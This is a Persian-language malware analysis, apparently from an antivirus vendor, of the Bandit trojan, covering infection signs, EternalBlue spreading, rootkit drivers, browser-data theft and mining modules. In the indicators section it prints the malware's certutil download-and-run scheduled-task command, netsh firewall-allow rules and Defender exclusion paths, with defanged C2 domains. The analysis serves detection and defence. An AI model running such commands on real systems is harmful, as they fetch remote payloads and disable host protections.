Trojan.Win32.Bandit.ApLib

شرح کلی

نوع: تروجان (Trojan)
درجه تخریببالا
میزان شیوعبالا

اسامی بدافزار

• Padvish) Trojan.Win32.Bandit.ApLib)
• Kaspersky) HEUR:Trojan.Win32.Chapak.pef)
• Avira) TR/AD.GoCloudnet.irwn)

تروجان (Trojan) چیست؟

تروجان‌ها نوعی از بدافزار محسوب می‌شوند که خود را در قالب یک نرم‌افزار سالم و قانونی نشان می‌دهند و بسیار شبیه نرم‌افزارهای مفید و کاربردی رفتار می‌کنند. اما هنگامی ‌که اجرا می‌شوند، خرابی‌های زیادی را برای سیستم ایجاد می‌کنند. نرم‌افزارهای دانلود شده از اینترنت، جاسازی شدن در متن HTML، ضمیمه شدن به یک ایمیل و … از جمله راه‌های ورود تروجان‌ها به سیستم هستند. تروجان‌ها برخلاف ویروس‌ها و کرم‌های کامپیوتری قادر به تکثیر خود نیستند.

تروجان Bandit چیست؟

Bandit، یک تروجان است که با استفاده از تکنیک‌های سطح پایین سیستم عامل ویندوز (کرنل)، فایل‌ها و پردازه‌های خود را از دید کاربر مخفی می‌کند. این بدافزار برای انتشار خود از آسیب‌پذیری EternalBlue استفاده می‌کند. سپس، در ارتباط با سرور فرماندهی و کنترل خود (command and control)، ماژول‌های مختلفی را دانلود و روی سیستم قربانی اجرا می‌کند.

توضیحات فنی

علائم آلودگی

• وجود کلید رجیستری TestApp که حاوی دامین‌های مخرب در مقادیر زیرکلیدهای آن باشد.
• وجود دو تسک زمان‌بندی شده مشابه زیر که یکی از آنها فایل به‌روزشده بدافزار را اجرا می‌کند و دیگری بدافزار موجود روی سیستم را اجرا می‌کند.

name : ScheduledUpdate
command : "cmd.exe /C certutil.exe -urlcache –split –f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340"
scheduled : ONLOGON

name : csrss

command : "C:\Windows\rss\csrss.exe"
scheduled : ONLOGON

• وجود زیرکلیدی در کلید رجیستری Run که فایل “C:\Windows\rss\csrss.exe” را اجرا می‌کند.
• وجود قوانین Firewall مشکوک نظیر:

Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”C:\Windows\rss\csrss.exe” enable=yes”

Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”%AppData%Roaming\EpicNet Inc\CloudNet\cloudnet.exe” enable=yes”

• وجود موارد زیر در لیست استثنائات Windows Defender:

Files/Directories :
C:\Windows
C:\Windows\rss
AppData%Roaming\EpicNet Inc\CloudNet
AppData%Local\Temp\csrss
AppData%\Roaming\WisprPine
C:\Windows\Windefender
AppData%Local\Temp\Wup
C:\Windows\System32\drivers
Processes: csrss.exe , cloudnet.exe , windefender.exe

شرح عملکرد

اجرای تکنیک شناسایی سند باکس و ماشین مجازی

بدافزار با اجرای تکنیک‌هایی تلاش می‌کند تشخیص دهد که محیط اجرا، محیط مجازی یا سندباکس می‌باشد یا خیر. درصورت تشخیص، اجرای بدافزار را متوقف می‌کند.

زیر کلیدهای مخرب کلید رجیستری TestApp

همان‌طور که ذکر شد، بدافزار کلیدی با نام TestApp در مسیر HKCU\software\microsoft\TestApp می‌سازد. در این حالت، کلید ذکر شده دارای تعداد زیادی زیرکلید مانند موارد زیر است (مقادیر این زیرکلیدها، به ویژه آدرس سرورها، ممکن است متفاوت باشد. همچنین، در گونه جدید، بدافزار از رشته‌های تصادفی مانند “dd47a129” نیز به جای نام “TestApp” استفاده می‌کند) :

Key : HKCU\software\microsoft\TestApp
Subkeys :
Uuid = ""
command = ""
FirstInstallDate = "56268135e"
ServiceVersion = ""
SC = ""
PGDSE = ""
VC = ""
ServerVersion = "94"
CDN = "hxxps://bestblues[.]tech"
PP = ""
name = "SmallSea"
servers = "hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"
firewall = ""
defender = ""

ایجاد پردازه csrss

بدافزار پس از اجرای تکنیک‌هایی برای ارتقا سطح دسترسی، دایرکتوری C:\Windows\rss را ایجاد و آن را به یک دایرکتوری پنهان تبدیل می‌کند. سپس، فایل خود را با نام csrss.exe در این مسیر کپی می‌کند.

انتشار در شبکه محلی

این بدافزار برای انتشار خود از ابزارهای مرتبط با آسیب پذیری‌های EternalBlue و DoublePulsar استفاده می‌کند. سیستم‌های دارای نسخه آسیب‌پذیر پروتکل SMB را درسطح شبکه شناسایی می‌کند و با سوءاستفاده از این آسیب پذیری، بدافزار خود را روی آنها اجرا می‌کند.

بارگذاری درایورها

بدافزار سه درایور ایجاد و راه اندازی می‌کند:
1. درایور Winmon.sys: این درایور برای مخفی کردن پردازه‌های بدافزار استفاده می‌شود.
2. درایور WinmonFs.sys: این درایور دایرکتوری‌ها/فایل‌های بدافزار را از دید آنتی‌ویروس‌ها و ابزارهای مانیتورینگ پنهان می‌کند.
3. درایور WinmonProcessMonitor: این درایور یک لیست طولانی از اسامی پردازه‌های مرتبط با محصولات مانیتورینگ سیستم، آنتی‌ویروس‌ها و … را دارد و در زمان ایجاد هر پردازه روی سیستم، بررسی می‌کند که نام پردازه جدید در این لیست نباشد. در غیر این صورت، به اجرای آن خاتمه می‌دهد.

دانلود و اجرای ماژول‌های بدافزار

1. ماژول Browser Stealer: این ماژول، کوکی‌ها، تاریخچه و پایگاه داده محلی (local storage) مرورگرهایی نظیر coccoc ،chrome ،opera ،Firefox و Yandex را استخراج و در قالب یک فایل zip به سرور خود ارسال می‌کند.
2. ماژول Router Exploit: این ماژول، با هدف سوءاستفاده از آسیب‌پذیری روترهای موجود در سطح شبکه اجرا می‌شود.
3. ماژول Collectchromefingerprint: این ماژول، بررسی می‌کند که آیا مرورگر گوگل کروم روی سیستم نصب می‌باشد یا خیر. در این صورت، لینک زیر را در این مرورگر باز می‌کند.

hxxps://swebgames[.]site/test.php?uuid=a1058f4a-2f08-4679-baf2-ae6c436cfaa5&browser=chrome

این لینک، یک صفحه html به ظاهر سفید است که در پس زمینه، کتابخانه جاوا اسکریپت DetectRTC به لینک https://github.com/muaz-khan/DetectRTC را اجرا می‌کند و امکانات WebRTC شامل اینکه آیا سیستم قربانی Microphone ،Speaker و Webcam دارد، تعداد ابزارهای صوتی و ویدیویی سیستم، امکان گرفتن snapshot و … را بررسی و نتیجه را به سرور بدافزار به آدرس زیر ارسال می‌کند.

hxxps://swebgames[.]site/fp.php

4. ماژول bot: این ماژول، سیستم قربانی را در سرورهای بدافزار رجیستر می‌کند و سپس ارتباطات زیادی را با آنها برقرار می‌کند. از جمله این ارتباطات، دریافت فهرستی از استخرهای فعال از شبکه بیت کوین و ارتباط با آنها در جهت انجام عملیات استخراج ارز دیجیتالی روی سیستم قربانی است.

روش مقابله و پاک‌سازی سیستم

آنتی ویروس پادویش این بدافزار را شناسایی کرده و از سیستم حذف می‌کند. جهت پیشگیری از آلودگی‌های احتمالی توسط بدافزارهایی که از آسیب‌پذیری EternalBlue استفاده می‌کنند، پیشنهاد می‌شود از وصله امنیتی ارائه شده توسط مایکروسافت ms17-010 استفاده کنید. بخش جلوگیری از نفوذ (IPS) آنتی‌ویروس پادویش بدافزارهایی که از این گونه آسیب‌پذیری‌ استفاده می‌کنند را شناسایی کرده و از ورود آنها به سیستم قربانی جلوگیری می کند.